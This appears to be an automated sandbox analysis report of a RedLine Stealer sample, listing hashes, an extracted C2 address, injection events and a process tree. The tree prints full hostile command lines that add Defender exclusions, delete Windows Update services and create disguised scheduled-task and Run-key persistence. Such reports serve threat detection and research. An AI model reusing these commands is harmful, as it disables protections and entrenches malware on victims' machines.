Analysis

max time kernel: 243s
max time network: 296s
platform: windows7_x64
resource: win7-20221111-en
resource tags: arch:x64, arch:x86, image:win7-20221111-en, locale:en-us, os:windows7-x64, system
submitted: 24-11-2022 15:56
Static task: static1

Behavioral task: behavioral1
Sample: 63c02bf79ba67e69dfb5b5f115986f8b.exe
Resource: win7-20221111-en

Behavioral task: behavioral2
Sample: 63c02bf79ba67e69dfb5b5f115986f8b.exe
Resource: win10v2004-20221111-en
General

Target: 63c02bf79ba67e69dfb5b5f115986f8b.exe
Size: 242KB
MD5: 63c02bf79ba67e69dfb5b5f115986f8b
SHA1: 0282d75ca0ef8167e1798ab5925bdddf604753c9
SHA256: 84806d7ed59a57fce9b4bb07519d78f25edd45c5e56c5739a252f4b4b3c701e2
SHA512: 0b2923317ef6cd3b034f61a22ad47ea95a4bf4de6c5f11a04a22a638f6c6de7c5d80dd844f6608de40a746c40f7a3e468d8daba26f7f81807e8c6b0b3844ebea
SSDEEP: 6144:71gE5wi2UCeNWGa+nMzVWMNQErpV2IviDnye3sEuYq7Z:pgEaACe1a+nMzVWMNQErpV2IvQypEuYa
Malware Config

Extracted: redline
37.220.87.2:27924
auth_value: e457de0f8e67971846447e9d0f415966
Signatures

- RedLine
  RedLine Stealer is a malware family written in C#, first appearing in early 2020.

- RedLine payload (4 IoCs)
  Processes (resource / yara_rule):
    behavioral1/memory/340-56-0x0000000000400000-0x0000000000428000-memory.dmp  family_redline
    behavioral1/memory/340-61-0x000000000042280E-mapping.dmp  family_redline
    behavioral1/memory/340-62-0x0000000000400000-0x0000000000428000-memory.dmp  family_redline
    behavioral1/memory/340-63-0x0000000000400000-0x0000000000428000-memory.dmp  family_redline

- Downloads MZ/PE file

- Executes dropped EXE (2 IoCs)
  Processes (pid / process):
    1744  brave.exe
    944   ofg.exe

- Loads dropped DLL (2 IoCs)
  Processes (pid / process):
    340  vbc.exe
    340  vbc.exe

- Uses the VBS compiler for execution (1 TTPs)

- Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

- Suspicious use of SetThreadContext (1 IoCs)
  Processes (description / pid / process / target process):
    PID 1156 set thread context of 340  1156  63c02bf79ba67e69dfb5b5f115986f8b.exe  vbc.exe

- Program crash (1 IoCs)
  Processes (pid / pid_target / process / target process):
    1168  1156  WerFault.exe  63c02bf79ba67e69dfb5b5f115986f8b.exe

- Creates scheduled task(s) (1 TTPs, 1 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.

- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes (pid / process):
    340  vbc.exe
    340  vbc.exe

- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes (description / pid / process):
    Token: SeDebugPrivilege  340  vbc.exe

- Suspicious use of WriteProcessMemory (34 IoCs)
  Processes (description / pid / process / target process); identical repeated events are collapsed with a count:
    PID 1156 wrote to memory of 340   1156  63c02bf79ba67e69dfb5b5f115986f8b.exe  vbc.exe         (x6)
    PID 1156 wrote to memory of 1168  1156  63c02bf79ba67e69dfb5b5f115986f8b.exe  WerFault.exe    (x4)
    PID 340 wrote to memory of 1744   340   vbc.exe    brave.exe       (x4)
    PID 340 wrote to memory of 944    340   vbc.exe    ofg.exe         (x4)
    PID 944 wrote to memory of 1992   944   ofg.exe    SCHTASKS.exe    (x4)
    PID 1744 wrote to memory of 1132  1744  brave.exe  powershell.exe  (x3)
    PID 1744 wrote to memory of 1000  1744  brave.exe  cmd.exe         (x3)
    PID 1744 wrote to memory of 1608  1744  brave.exe  cmd.exe         (x3)
    PID 1744 wrote to memory of 1296  1744  brave.exe  powershell.exe  (x3)
Processes (process tree; the number in brackets is the depth in the tree)

[1] C:\Users\Admin\AppData\Local\Temp\63c02bf79ba67e69dfb5b5f115986f8b.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\63c02bf79ba67e69dfb5b5f115986f8b.exe"
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory

    [2] C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
        Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
        - Loads dropped DLL
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory

        [3] C:\Users\Admin\AppData\Local\Google\brave.exe
            Command line: "C:\Users\Admin\AppData\Local\Google\brave.exe"
            - Executes dropped EXE
            - Suspicious use of WriteProcessMemory

            [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Command line: powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

            [4] C:\Windows\system32\cmd.exe
                Command line: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

            [4] C:\Windows\system32\cmd.exe
                Command line: cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

            [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Command line: powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }

        [3] C:\Users\Admin\AppData\Local\Google\ofg.exe
            Command line: "C:\Users\Admin\AppData\Local\Google\ofg.exe"
            - Executes dropped EXE
            - Suspicious use of WriteProcessMemory

            [4] C:\Windows\SysWOW64\SCHTASKS.exe
                Command line: SCHTASKS /Create /TR "C:\Users\Admin\AppData\Local\Google\ofg.exe" /TN "MicrosoftEdge{e60e5877-76e2-4b84-98a8-90161a4b47ca}" /SC ONLOGON /F /RL HIGHEST
                - Creates scheduled task(s)

    [2] C:\Windows\SysWOW64\WerFault.exe
        Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1156 -s 48
        - Program crash
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

- C:\Users\Admin\AppData\Local\Google\brave.exe
  Filesize: 2.8MB
  MD5: 9253ed091d81e076a3037e12af3dc871
  SHA1: ec02829a25b3bf57ad061bbe54180d0c99c76981
  SHA256: 78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859
  SHA512: 29ff2fd5f150d10b2d281a45df5b44873192605de8dc95278d6a7b5053370e4ac64a47100b13c63f3c048df351a9b51f0b93af7d922399a91508a50c152e8cf4

- C:\Users\Admin\AppData\Local\Google\ofg.exe
  Filesize: 86KB
  MD5: 33dad992607d0ffd44d2c81fe67f8fb1
  SHA1: e5b67dc05505fb1232504231f41cba225c282d3c
  SHA256: 95903d8c2d48c4c0667e41878807f646f7648a33ed25d0eb433aab41c25e31a4
  SHA512: 444973b44292c433a07e5f75f6580ea71799b1f835677bc5b2e42af6b567a2f70f1b038f019d250a18216701ccf901b300632487eebcc1113ac803edb43159e4

- \Users\Admin\AppData\Local\Google\brave.exe
  Filesize: 2.8MB
  MD5: 9253ed091d81e076a3037e12af3dc871
  SHA1: ec02829a25b3bf57ad061bbe54180d0c99c76981
  SHA256: 78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859
  SHA512: 29ff2fd5f150d10b2d281a45df5b44873192605de8dc95278d6a7b5053370e4ac64a47100b13c63f3c048df351a9b51f0b93af7d922399a91508a50c152e8cf4

- \Users\Admin\AppData\Local\Google\ofg.exe
  Filesize: 86KB
  MD5: 33dad992607d0ffd44d2c81fe67f8fb1
  SHA1: e5b67dc05505fb1232504231f41cba225c282d3c
  SHA256: 95903d8c2d48c4c0667e41878807f646f7648a33ed25d0eb433aab41c25e31a4
  SHA512: 444973b44292c433a07e5f75f6580ea71799b1f835677bc5b2e42af6b567a2f70f1b038f019d250a18216701ccf901b300632487eebcc1113ac803edb43159e4

- memory/340-63-0x0000000000400000-0x0000000000428000-memory.dmp
  Filesize: 160KB

- memory/340-54-0x0000000000400000-0x0000000000428000-memory.dmp
  Filesize: 160KB

- memory/340-65-0x0000000075671000-0x0000000075673000-memory.dmp
  Filesize: 8KB

- memory/340-56-0x0000000000400000-0x0000000000428000-memory.dmp
  Filesize: 160KB

- memory/340-62-0x0000000000400000-0x0000000000428000-memory.dmp
  Filesize: 160KB

- memory/340-61-0x000000000042280E-mapping.dmp

- memory/944-70-0x0000000000000000-mapping.dmp

- memory/1000-75-0x0000000000000000-mapping.dmp

- memory/1132-73-0x0000000000000000-mapping.dmp

- memory/1132-74-0x000007FEFB6F1000-0x000007FEFB6F3000-memory.dmp
  Filesize: 8KB

- memory/1168-64-0x0000000000000000-mapping.dmp

- memory/1296-77-0x0000000000000000-mapping.dmp

- memory/1608-76-0x0000000000000000-mapping.dmp

- memory/1744-67-0x0000000000000000-mapping.dmp

- memory/1992-72-0x0000000000000000-mapping.dmp